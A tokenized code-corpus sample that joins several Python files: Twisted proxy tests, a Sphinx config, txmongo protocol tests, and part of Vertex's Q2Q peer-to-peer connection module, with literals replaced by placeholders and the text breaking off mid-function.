<NUM_LIT> ) <EOL> self . assertEqual ( request . responseMessage , b"<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> list ( request . responseHeaders . getAllRawHeaders ( ) ) , <EOL> [ ( b"<STR_LIT:Content-Type>" , [ b"<STR_LIT>" ] ) ] ) <EOL> self . assertEqual ( <EOL> b'<STR_LIT>' . join ( request . written ) , <EOL> b"<STR_LIT>" ) <EOL> self . assertEqual ( request . finished , <NUM_LIT:1> ) <EOL> def test_buildProtocol ( self ) : <EOL> """<STR_LIT>""" <EOL> factory = ProxyClientFactory ( b'<STR_LIT:GET>' , b'<STR_LIT>' , b'<STR_LIT>' , <EOL> { b"<STR_LIT>" : b"<STR_LIT>" } , b'<STR_LIT>' , <EOL> None ) <EOL> proto = factory . buildProtocol ( None ) <EOL> self . assertIsInstance ( proto , ProxyClient ) <EOL> self . assertEqual ( proto . command , b'<STR_LIT:GET>' ) <EOL> self . assertEqual ( proto . rest , b'<STR_LIT>' ) <EOL> self . assertEqual ( proto . data , b'<STR_LIT>' ) <EOL> self . assertEqual ( proto . headers , <EOL> { b"<STR_LIT>" : b"<STR_LIT>" , b"<STR_LIT>" : b"<STR_LIT>" } ) <EOL> class ProxyRequestTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def _testProcess ( self , uri , expectedURI , method = b"<STR_LIT:GET>" , data = b"<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> transport = StringTransportWithDisconnection ( ) <EOL> channel = DummyChannel ( transport ) <EOL> reactor = MemoryReactor ( ) <EOL> request = ProxyRequest ( channel , False , reactor ) <EOL> request . gotLength ( len ( data ) ) <EOL> request . handleContentChunk ( data ) <EOL> request . requestReceived ( method , b'<STR_LIT>' + uri , <EOL> b'<STR_LIT>' ) <EOL> self . assertEqual ( len ( reactor . tcpClients ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , u"<STR_LIT>" ) <EOL> self . assertEqual ( reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <NUM_LIT> ) <EOL> factory = reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] <EOL> self . assertIsInstance ( factory , ProxyClientFactory ) <EOL> self . assertEqual ( factory . command , method ) <EOL> self . assertEqual ( factory . version , b'<STR_LIT>' ) <EOL> self . assertEqual ( factory . headers , { b'<STR_LIT:host>' : b'<STR_LIT>' } ) <EOL> self . assertEqual ( factory . data , data ) <EOL> self . assertEqual ( factory . rest , expectedURI ) <EOL> self . assertEqual ( factory . father , request ) <EOL> def test_process ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _testProcess ( b"<STR_LIT>" , b"<STR_LIT>" ) <EOL> def test_processWithoutTrailingSlash ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _testProcess ( b"<STR_LIT>" , b"<STR_LIT:/>" ) <EOL> def test_processWithData ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _testProcess ( <EOL> b"<STR_LIT>" , b"<STR_LIT>" , b"<STR_LIT:POST>" , b"<STR_LIT>" ) <EOL> def test_processWithPort ( self ) : <EOL> """<STR_LIT>""" <EOL> transport = StringTransportWithDisconnection ( ) <EOL> channel = DummyChannel ( transport ) <EOL> reactor = MemoryReactor ( ) <EOL> request = ProxyRequest ( channel , False , reactor ) <EOL> request . gotLength ( <NUM_LIT:0> ) <EOL> request . requestReceived ( b'<STR_LIT:GET>' , b'<STR_LIT>' , <EOL> b'<STR_LIT>' ) <EOL> self . assertEqual ( len ( reactor . tcpClients ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , u"<STR_LIT>" ) <EOL> self . assertEqual ( reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <NUM_LIT> ) <EOL> class DummyFactory ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , port ) : <EOL> self . host = host <EOL> self . port = port <EOL> class ReverseProxyRequestTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_process ( self ) : <EOL> """<STR_LIT>""" <EOL> transport = StringTransportWithDisconnection ( ) <EOL> channel = DummyChannel ( transport ) <EOL> reactor = MemoryReactor ( ) <EOL> request = ReverseProxyRequest ( channel , False , reactor ) <EOL> request . factory = DummyFactory ( u"<STR_LIT>" , <NUM_LIT> ) <EOL> request . gotLength ( <NUM_LIT:0> ) <EOL> request . requestReceived ( b'<STR_LIT:GET>' , b'<STR_LIT>' , b'<STR_LIT>' ) <EOL> self . assertEqual ( len ( reactor . tcpClients ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , u"<STR_LIT>" ) <EOL> self . assertEqual ( reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <NUM_LIT> ) <EOL> factory = reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] <EOL> self . assertIsInstance ( factory , ProxyClientFactory ) <EOL> self . assertEqual ( factory . headers , { b'<STR_LIT:host>' : b'<STR_LIT>' } ) </s>
<s> import sys <EOL> import os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = version <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> from __future__ import absolute_import , division <EOL> from bson import BSON <EOL> from twisted . trial import unittest <EOL> from twisted . python . compat import unicode <EOL> from txmongo . protocol import MongoClientProtocol , MongoDecoder , Insert , Query , KillCursors , Getmore , Update , Delete , UPDATE_MULTI , UPDATE_UPSERT , DELETE_SINGLE_REMOVE <EOL> class _FakeTransport ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . data = [ ] <EOL> def write ( self , data ) : <EOL> self . data . append ( data ) <EOL> def get_content ( self ) : <EOL> return b'<STR_LIT>' . join ( self . data ) <EOL> class TestMongoProtocol ( unittest . TestCase ) : <EOL> def __test_encode_decode ( self , request ) : <EOL> proto = MongoClientProtocol ( ) <EOL> proto . transport = _FakeTransport ( ) <EOL> proto . send ( request ) <EOL> decoder = MongoDecoder ( ) <EOL> decoder . feed ( proto . transport . get_content ( ) ) <EOL> decoded = next ( decoder ) <EOL> for field , dec_value , req_value in zip ( request . _fields , decoded , request ) : <EOL> if field not in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> if isinstance ( dec_value , bytes ) and isinstance ( req_value , unicode ) : <EOL> dec_value = dec_value . decode ( ) <EOL> self . assertEqual ( dec_value , req_value ) <EOL> def test_EncodeDecodeQuery ( self ) : <EOL> request = Query ( collection = "<STR_LIT>" , n_to_skip = <NUM_LIT> , n_to_return = <NUM_LIT> , <EOL> query = BSON . encode ( { '<STR_LIT:x>' : <NUM_LIT> } ) , <EOL> fields = BSON . encode ( { '<STR_LIT:y>' : <NUM_LIT:1> } ) ) <EOL> self . __test_encode_decode ( request ) <EOL> def test_EncodeDecodeKillCursors ( self ) : <EOL> request = KillCursors ( cursors = [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> self . __test_encode_decode ( request ) <EOL> def test_EncodeDecodeGetmore ( self ) : <EOL> request = Getmore ( collection = "<STR_LIT>" , cursor_id = <NUM_LIT> , n_to_return = <NUM_LIT:5> ) <EOL> self . __test_encode_decode ( request ) <EOL> def test_EncodeDecodeInsert ( self ) : <EOL> request = Insert ( collection = "<STR_LIT>" , documents = [ BSON . encode ( { '<STR_LIT:x>' : <NUM_LIT> } ) ] ) <EOL> self . __test_encode_decode ( request ) <EOL> def test_EncodeDecodeUpdate ( self ) : <EOL> request = Update ( flags = UPDATE_MULTI | UPDATE_UPSERT , collection = "<STR_LIT>" , <EOL> selector = BSON . encode ( { '<STR_LIT:x>' : <NUM_LIT> } ) , <EOL> update = BSON . encode ( { "<STR_LIT>" : { '<STR_LIT:y>' : <NUM_LIT> } } ) ) <EOL> self . __test_encode_decode ( request ) <EOL> def test_EncodeDecodeDelete ( self ) : <EOL> request = Delete ( flags = DELETE_SINGLE_REMOVE , collection = "<STR_LIT>" , <EOL> selector = BSON . encode ( { '<STR_LIT:x>' : <NUM_LIT> } ) ) <EOL> self . __test_encode_decode ( request ) </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> from hashlib import md5 <EOL> import struct <EOL> import datetime <EOL> import time <EOL> from collections import namedtuple <EOL> from pprint import pformat <EOL> from zope . interface import implements <EOL> from twisted . internet import reactor , defer , interfaces , protocol , error <EOL> from twisted . internet . main import CONNECTION_DONE <EOL> from twisted . internet . ssl import ( <EOL> CertificateRequest , Certificate , PrivateCertificate , KeyPair , <EOL> DistinguishedName ) <EOL> from twisted . python import log <EOL> from twisted . python . failure import Failure <EOL> from twisted . application import service <EOL> from twisted . cred . checkers import ICredentialsChecker <EOL> from twisted . cred . portal import IRealm , Portal <EOL> from twisted . cred . credentials import IUsernamePassword , UsernamePassword <EOL> from twisted . cred . error import UnauthorizedLogin <EOL> from twisted . protocols . amp import Argument , Boolean , Integer , String , Unicode , ListOf , AmpList <EOL> from twisted . protocols . amp import AmpBox , Command , StartTLS , ProtocolSwitchCommand , AMP <EOL> from twisted . protocols . amp import _objectsToStrings <EOL> from vertex import subproducer , ptcp <EOL> from vertex import endpoint , ivertex <EOL> from vertex . conncache import ConnectionCache <EOL> port = <NUM_LIT> <EOL> class ConnectionError ( Exception ) : <EOL> pass <EOL> class AttemptsFailed ( ConnectionError ) : <EOL> pass <EOL> class NoAttemptsMade ( ConnectionError ) : <EOL> pass <EOL> class VerifyError ( Exception ) : <EOL> pass <EOL> class BadCertificateRequest ( VerifyError ) : <EOL> pass <EOL> class IgnoreConnectionFailed ( protocol . ClientFactory ) : <EOL> def __init__ ( self , realFactory ) : <EOL> self . realFactory = realFactory <EOL> def clientConnectionLost ( self , connector , reason ) : <EOL> self . realFactory . clientConnectionLost ( connector , reason ) <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> pass <EOL> def buildProtocol ( self , addr ) : <EOL> return self . realFactory . buildProtocol ( addr ) <EOL> class Q2QAddress ( object ) : <EOL> def __init__ ( self , domain , resource = None ) : <EOL> self . resource = resource <EOL> self . domain = domain <EOL> def domainAddress ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . resource is None : <EOL> return self <EOL> else : <EOL> return Q2QAddress ( self . domain ) <EOL> def claimedAsIssuerOf ( self , cert ) : <EOL> """<STR_LIT>""" <EOL> return cert . getIssuer ( ) . commonName == str ( self ) <EOL> def claimedAsSubjectOf ( self , cert ) : <EOL> """<STR_LIT>""" <EOL> return cert . getSubject ( ) . commonName == str ( self ) <EOL> def __cmp__ ( self , other ) : <EOL> if not isinstance ( other , Q2QAddress ) : <EOL> return cmp ( self . __class__ , other . __class__ ) <EOL> return cmp ( ( self . domain , self . resource ) , ( other . domain , other . resource ) ) <EOL> def __iter__ ( self ) : <EOL> return iter ( ( self . resource , self . domain ) ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . resource : <EOL> resource = self . resource + '<STR_LIT:@>' <EOL> else : <EOL> resource = '<STR_LIT>' <EOL> return ( resource + self . domain ) . encode ( '<STR_LIT:utf-8>' ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . __str__ ( ) <EOL> def __hash__ ( self ) : <EOL> return hash ( str ( self ) ) <EOL> def fromString ( cls , string ) : <EOL> args = string . split ( "<STR_LIT:@>" , <NUM_LIT:1> ) <EOL> args . reverse ( ) <EOL> return cls ( * args ) <EOL> fromString = classmethod ( fromString ) <EOL> class VirtualTransportAddress : <EOL> def __init__ ( self , underlying ) : <EOL> self . underlying = underlying <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . underlying , ) <EOL> class Q2QTransportAddress : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , underlying , logical , protocol ) : <EOL> self . underlying = underlying <EOL> self . logical = logical <EOL> self . protocol = protocol <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . underlying , <EOL> self . logical , <EOL> self . protocol ) <EOL> class AmpTime ( Argument ) : <EOL> def toString ( self , inObject ) : <EOL> return inObject . strftime ( "<STR_LIT>" ) <EOL> def fromString ( self , inString ) : <EOL> return datetime . datetime . strptime ( inString , "<STR_LIT>" ) <EOL> class Q2QAddressArgument ( Argument ) : <EOL> fromString = Q2QAddress . fromString <EOL> toString = Q2QAddress . __str__ <EOL> class HostPort ( Argument ) : <EOL> def toString ( self , inObj ) : <EOL> return "<STR_LIT>" % tuple ( inObj ) <EOL> def fromString ( self , inStr ) : <EOL> host , sPort = inStr . split ( "<STR_LIT::>" ) <EOL> return ( host , int ( sPort ) ) <EOL> class _BinaryLoadable ( String ) : <EOL> def toString ( self , arg ) : <EOL> assert isinstance ( arg , self . loader ) , "<STR_LIT>" % ( arg , self . loader ) <EOL> return String . toString ( self , arg . dump ( ) ) <EOL> def fromString ( self , arg ) : <EOL> return self . loader . load ( String . fromString ( self , arg ) ) <EOL> class CertReq ( _BinaryLoadable ) : <EOL> loader = CertificateRequest <EOL> class Cert ( _BinaryLoadable ) : <EOL> loader = Certificate <EOL> from twisted . internet import protocol <EOL> class Q2QClientProtocolFactoryWrapper : <EOL> def __init__ ( self , service , cpf , fromAddress , toAddress , protocolName , <EOL> connectionEstablishedDeferred ) : <EOL> self . service = service <EOL> self . cpf = cpf <EOL> self . fromAddress = fromAddress <EOL> self . toAddress = toAddress <EOL> self . protocolName = protocolName <EOL> self . connectionEstablishedDeferred = connectionEstablishedDeferred <EOL> connectionEstablishedDeferred . addCallback ( self . setMyClient ) <EOL> myClient = None <EOL> def setMyClient ( self , myClient ) : <EOL> self . myClient = myClient <EOL> return myClient <EOL> def buildProtocol ( self , addr ) : <EOL> subProto = self . cpf . buildProtocol ( self . toAddress ) <EOL> myProto = SeparateConnectionTransport ( self . service , subProto , self . fromAddress , <EOL> self . toAddress , self . protocolName , <EOL> self . connectionEstablishedDeferred ) <EOL> return myProto <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> assert self . myClient is None <EOL> self . connectionEstablishedDeferred . errback ( reason ) <EOL> def clientConnectionLost ( self , connector , reason ) : <EOL> if self . myClient is not None : <EOL> self . cpf . clientConnectionLost ( connector , reason ) <EOL> def doStart ( self ) : <EOL> self . cpf . doStart ( ) <EOL> def doStop ( self ) : <EOL> self . cpf . doStop ( ) <EOL> class ImmediatelyLoseConnection ( protocol . Protocol ) : <EOL> def connectionMade ( self ) : <EOL> self . transport . loseConnection ( ) <EOL> class AbstractConnectionAttempt ( protocol . ClientFactory ) : <EOL> def __init__ ( self , method , q2qproto , connectionID , fromAddress , toAddress , <EOL> protocolName , clientProtocolFactory , issueGreeting = False ) : <EOL> self . method = method <EOL> self . q2qproto = q2qproto <EOL> assert isinstance ( connectionID , str ) <EOL> self . connectionID = connectionID <EOL> self . q2qproto = q2qproto <EOL> self . fromAddress = fromAddress <EOL> self . toAddress = toAddress <EOL> self . protocolName = protocolName <EOL> self . deferred = defer . Deferred ( ) <EOL> self . clientProtocolFactory = Q2QClientProtocolFactoryWrapper ( <EOL> q2qproto . service , <EOL> clientProtocolFactory , fromAddress , toAddress , protocolName , <EOL> self . deferred ) <EOL> self . issueGreeting = issueGreeting <EOL> def startAttempt ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> q2qb = None <EOL> cancelled = False <EOL> def buildProtocol ( self , addr ) : <EOL> if self . cancelled : <EOL> return ImmediatelyLoseConnection ( ) <EOL> assert self . q2qb is None <EOL> self . q2qb = Q2QBootstrap ( <EOL> self . connectionID , self . clientProtocolFactory ) <EOL> return self . q2qb <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> """<STR_LIT:U+0020>""" <EOL> def clientConnectionLost ( self , connector , reason ) : <EOL> """<STR_LIT:U+0020>""" <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> self . cancelled = True <EOL> class TCPConnectionAttempt ( AbstractConnectionAttempt ) : <EOL> attempted = False <EOL> def startAttempt ( self ) : <EOL> assert not self . attempted <EOL> self . attempted = True <EOL> reactor . connectTCP ( self . method . host , self . method . port , self ) <EOL> return self . deferred <EOL> class TCPMethod : <EOL> def __init__ ( self , hostport ) : <EOL> self . host , port = hostport . split ( '<STR_LIT::>' ) <EOL> self . port = int ( port ) <EOL> attemptFactory = TCPConnectionAttempt <EOL> relayable = True <EOL> ptype = '<STR_LIT>' <EOL> def toString ( self ) : <EOL> return '<STR_LIT>' % ( self . ptype , self . host , self . port ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . toString ( ) <EOL> def attempt ( self , * a ) : <EOL> return [ self . attemptFactory ( self , * a ) ] <EOL> connectionCounter = itertools . count ( ) . next <EOL> connectionCounter ( ) <EOL> class VirtualConnectionAttempt ( AbstractConnectionAttempt ) : <EOL> attempted = False <EOL> def startAttempt ( self ) : <EOL> assert not self . attempted <EOL> self . attempted = True <EOL> cid = connectionCounter ( ) <EOL> if self . q2qproto . isServer : <EOL> cid = - cid <EOL> innerTransport = VirtualTransport ( self . q2qproto , cid , self , True ) <EOL> def startit ( result ) : <EOL> innerTransport . startProtocol ( ) <EOL> return self . deferred <EOL> d = self . q2qproto . callRemote ( Virtual , id = cid ) <EOL> d . addCallback ( startit ) <EOL> return d <EOL> class VirtualMethod : <EOL> def __init__ ( self , virt = None ) : <EOL> pass <EOL> relayable = False <EOL> def toString ( self ) : <EOL> return '<STR_LIT>' <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . toString ( ) , ) <EOL> def attempt ( self , * a ) : <EOL> return [ VirtualConnectionAttempt ( self , * a ) ] <EOL> class _PTCPConnectionAttempt1NoPress ( AbstractConnectionAttempt ) : <EOL> attempted = False <EOL> def startAttempt ( self ) : <EOL> assert not self . attempted <EOL> self . attempted = True <EOL> svc = self . q2qproto . service <EOL> dsp = svc . dispatcher <EOL> dsp . connectPTCP ( <EOL> self . method . host , self . method . port , self , <EOL> svc . sharedUDPPortnum ) <EOL> return self . deferred <EOL> class _PTCPConnectionAttemptPress ( AbstractConnectionAttempt ) : <EOL> attempted = False <EOL> def startAttempt ( self ) : <EOL> assert not self . attempted <EOL> self . attempted = True <EOL> svc = self . q2qproto . service <EOL> dsp = svc . dispatcher <EOL> newPort = self . newPort = dsp . bindNewPort ( ) <EOL> dsp . connectPTCP ( <EOL> self . method . host , self . method . port , self , <EOL> newPort ) <EOL> return self . deferred <EOL> def cancel ( self ) : <EOL> if not self . cancelled : <EOL> self . q2qproto . service . dispatcher . unbindPort ( self . newPort ) <EOL> else : <EOL> print '<STR_LIT>' <EOL> AbstractConnectionAttempt . cancel ( self ) <EOL> class PTCPMethod ( TCPMethod ) : <EOL> """<STR_LIT>""" <EOL> ptype = '<STR_LIT>' <EOL> def attempt ( self , * a ) : <EOL> return [ _PTCPConnectionAttempt1NoPress ( self , * a ) , <EOL> _PTCPConnectionAttemptPress ( self , * a ) ] <EOL> class RPTCPConnectionAttempt ( AbstractConnectionAttempt ) : <EOL> attempted = False <EOL> def startAttempt ( self ) : <EOL> assert not self . attempted <EOL> self . attempted = True <EOL> realLocalUDP = self . newPort = self . q2qproto . service . dispatcher . seedNAT ( ( self . method . host , self . method . port ) ) <EOL> def enbinden ( boundereded ) : <EOL> if not self . cancelled : <EOL> self . q2qproto . service . dispatcher . connectPTCP ( <EOL> self . method . host , self . method . port , self , realLocalUDP <EOL> ) <EOL> return self . deferred <EOL> def swallowKnown ( error ) : <EOL> error . trap ( ConnectionError ) <EOL> self . deferred . errback ( CONNECTION_DONE ) <EOL> return self . deferred <EOL> d = self . q2qproto . callRemote ( <EOL> BindUDP , <EOL> q2qsrc = self . toAddress , <EOL> q2qdst = self . fromAddress , <EOL> protocol = self . protocolName , <EOL> udpsrc = ( self . method . host , self . method . port ) , <EOL> udpdst = ( self . q2qproto . _determinePublicIP ( ) , realLocalUDP ) ) <EOL> d . addCallbacks ( enbinden , swallowKnown ) <EOL> return d <EOL> def cancel ( self ) : <EOL> if not self . cancelled : <EOL> self . q2qproto . service . dispatcher . unbindPort ( self . newPort ) <EOL> else : <EOL> print '<STR_LIT>' <EOL> AbstractConnectionAttempt . cancel ( self ) <EOL> class RPTCPMethod ( TCPMethod ) : <EOL> """<STR_LIT>""" <EOL> ptype = '<STR_LIT>' <EOL> attemptFactory = RPTCPConnectionAttempt <EOL> class UnknownMethod : <EOL> relayable = True <EOL> def __init__ ( self , S ) : <EOL> self . string = S <EOL> def attemptConnect ( self , q2qproto , connectionID , From , to , <EOL> protocolName , protocolFactory ) : <EOL> return defer . fail ( Failure ( ConnectionError ( <EOL> "<STR_LIT>" % ( self . string , ) ) ) ) <EOL> _methodFactories = { '<STR_LIT>' : VirtualMethod , <EOL> '<STR_LIT>' : TCPMethod , <EOL> '<STR_LIT>' : PTCPMethod , <EOL> '<STR_LIT>' : RPTCPMethod } <EOL> class Method ( Argument ) : <EOL> def toString ( self , inObj ) : <EOL> return inObj . toString ( ) <EOL> def fromString ( self , inString ) : <EOL> f = inString . split ( "<STR_LIT:@>" , <NUM_LIT:1> ) <EOL> factoryName = f [ <NUM_LIT:0> ] <EOL> if len ( f ) > <NUM_LIT:1> : <EOL> factoryData = f [ <NUM_LIT:1> ] <EOL> else : <EOL> factoryData = '<STR_LIT>' <EOL> methodFactory = _methodFactories . get ( factoryName , None ) <EOL> if methodFactory is None : <EOL> factory = UnknownMethod ( inString ) <EOL> else : <EOL> factory = methodFactory ( factoryData ) <EOL> return factory <EOL> class Secure ( StartTLS ) : <EOL> commandName = "<STR_LIT>" <EOL> arguments = StartTLS . arguments + [ <EOL> ( '<STR_LIT>' , Q2QAddressArgument ( optional = True ) ) , <EOL> ( '<STR_LIT:to>' , Q2QAddressArgument ( ) ) , <EOL> ( '<STR_LIT>' , Boolean ( ) ) <EOL> ] <EOL> class Listen ( Command ) : <EOL> """<STR_LIT>""" <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ <EOL> ( '<STR_LIT>' , Q2QAddressArgument ( ) ) , <EOL> ( '<STR_LIT>' , ListOf ( String ( ) ) ) , <EOL> ( '<STR_LIT:description>' , Unicode ( ) ) ] <EOL> result = [ ] <EOL> class ConnectionStartBox ( AmpBox ) : <EOL> def __init__ ( self , __transport ) : <EOL> super ( ConnectionStartBox , self ) . __init__ ( ) <EOL> self . virtualTransport = __transport <EOL> def _sendTo ( self , proto ) : <EOL> super ( ConnectionStartBox , self ) . _sendTo ( proto ) <EOL> self . virtualTransport . startProtocol ( ) <EOL> class Virtual ( Command ) : <EOL> commandName = '<STR_LIT>' <EOL> result = [ ] <EOL> arguments = [ ( '<STR_LIT:id>' , Integer ( ) ) ] <EOL> def makeResponse ( cls , objects , proto ) : <EOL> tpt = objects . pop ( '<STR_LIT>' ) <EOL> return _objectsToStrings ( <EOL> objects , cls . response , <EOL> ConnectionStartBox ( tpt ) , <EOL> proto ) <EOL> makeResponse = classmethod ( makeResponse ) <EOL> class Identify ( Command ) : <EOL> """<STR_LIT>""" <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ ( '<STR_LIT>' , Q2QAddressArgument ( ) ) ] <EOL> response = [ ( '<STR_LIT>' , Cert ( ) ) ] <EOL> class BindUDP ( Command ) : <EOL> """<STR_LIT>""" <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ <EOL> ( '<STR_LIT>' , String ( ) ) , <EOL> ( '<STR_LIT>' , Q2QAddressArgument ( ) ) , <EOL> ( '<STR_LIT>' , Q2QAddressArgument ( ) ) , <EOL> ( '<STR_LIT>' , HostPort ( ) ) , <EOL> ( '<STR_LIT>' , HostPort ( ) ) , <EOL> ] <EOL> errors = { ConnectionError : '<STR_LIT>' } <EOL> response = [ ] <EOL> class SourceIP ( Command ) : <EOL> """<STR_LIT>""" <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ ] <EOL> response = [ ( '<STR_LIT>' , String ( ) ) ] <EOL> class Inbound ( Command ) : <EOL> """<STR_LIT>""" <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ ( '<STR_LIT>' , Q2QAddressArgument ( ) ) , <EOL> ( '<STR_LIT:to>' , Q2QAddressArgument ( ) ) , <EOL> ( '<STR_LIT>' , String ( ) ) , <EOL> ( '<STR_LIT>' , HostPort ( optional = True ) ) ] <EOL> response = [ ( '<STR_LIT>' , AmpList ( <EOL> [ ( '<STR_LIT:id>' , String ( ) ) , <EOL> ( '<STR_LIT>' , Cert ( optional = True ) ) , <EOL> ( '<STR_LIT>' , ListOf ( Method ( ) ) ) , <EOL> ( '<STR_LIT>' , AmpTime ( ) ) , <EOL> ( '<STR_LIT:description>' , Unicode ( ) ) ] ) ) ] <EOL> errors = { KeyError : "<STR_LIT>" } <EOL> fatalErrors = { VerifyError : "<STR_LIT>" } <EOL> class Outbound ( Command ) : <EOL> """<STR_LIT>""" <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ ( '<STR_LIT>' , Q2QAddressArgument ( ) ) , <EOL> ( '<STR_LIT:to>' , Q2QAddressArgument ( ) ) , <EOL> ( '<STR_LIT>' , String ( ) ) , <EOL> ( '<STR_LIT:id>' , String ( ) ) , <EOL> ( '<STR_LIT>' , ListOf ( Method ( ) ) ) ] <EOL> response = [ ] <EOL> errors = { AttemptsFailed : '<STR_LIT>' } <EOL> class Sign ( Command ) : <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ ( '<STR_LIT>' , CertReq ( ) ) , <EOL> ( '<STR_LIT:password>' , String ( ) ) ] <EOL> response = [ ( '<STR_LIT>' , Cert ( ) ) ] <EOL> errors = { KeyError : "<STR_LIT>" , <EOL> BadCertificateRequest : "<STR_LIT>" } <EOL> class Choke ( Command ) : <EOL> """<STR_LIT>""" <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ ( '<STR_LIT:id>' , Integer ( ) ) ] <EOL> requiresAnswer = False <EOL> class Unchoke ( Command ) : <EOL> """<STR_LIT>""" <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ ( '<STR_LIT:id>' , Integer ( ) ) ] <EOL> requiresAnswer = False <EOL> def safely ( f , * a , ** k ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> f ( * a , ** k ) <EOL> except : <EOL> log . err ( ) <EOL> class Q2Q ( AMP , subproducer . SuperProducer ) : <EOL> """<STR_LIT>""" <EOL> protocolName = '<STR_LIT>' <EOL> service = None <EOL> publicIP = None <EOL> authorized = False <EOL> def __init__ ( self , * a , ** kw ) : <EOL> """<STR_LIT>""" <EOL> subproducer . SuperProducer . __init__ ( self ) <EOL> AMP . __init__ ( self , * a , ** kw ) <EOL> def connectionMade ( self ) : <EOL> self . producingTransports = { } <EOL> self . connections = { } <EOL> self . listeningClient = [ ] <EOL> self . connectionObservers = [ ] <EOL> if self . service . publicIP is None : <EOL> log . msg ( "<STR_LIT>" ) <EOL> self . service . publicIP = self . transport . getHost ( ) . host <EOL> self . service . _publicIPIsReallyPrivate = True <EOL> def rememberPublicIP ( pubip ) : <EOL> ip = pubip [ '<STR_LIT>' ] <EOL> log . msg ( '<STR_LIT>' % ip ) <EOL> self . publicIP = ip <EOL> self . service . publicIP = ip <EOL> self . service . _publicIPIsReallyPrivate = False <EOL> self . callRemote ( SourceIP ) . addCallback ( rememberPublicIP ) <EOL> else : <EOL> log . msg ( "<STR_LIT>" % ( self . service . publicIP , ) ) <EOL> def connectionLost ( self , reason ) : <EOL> "<STR_LIT>" <EOL> AMP . connectionLost ( self , reason ) <EOL> self . _uncacheMe ( ) <EOL> self . producingTransports = { } <EOL> for key , value in self . listeningClient : <EOL> log . msg ( "<STR_LIT>" % ( key , ) ) <EOL> self . service . listeningClients [ key ] . remove ( value ) <EOL> self . listeningClient = [ ] <EOL> for xport in self . connections . values ( ) : <EOL> safely ( xport . connectionLost , reason ) <EOL> for observer in self . connectionObservers : <EOL> safely ( observer ) <EOL> def notifyOnConnectionLost ( self , observer ) : <EOL> "<STR_LIT>" <EOL> self . connectionObservers . append ( observer ) <EOL> def _bindUDP ( self , q2qsrc , q2qdst , udpsrc , udpdst , protocol ) : <EOL> self . verifyCertificateAllowed ( q2qsrc , q2qdst ) <EOL> srchost , srcport = udpsrc <EOL> lcget = self . service . listeningClients . get ( ( q2qsrc , protocol ) , ( ) ) <EOL> bindery = [ ] <EOL> for ( 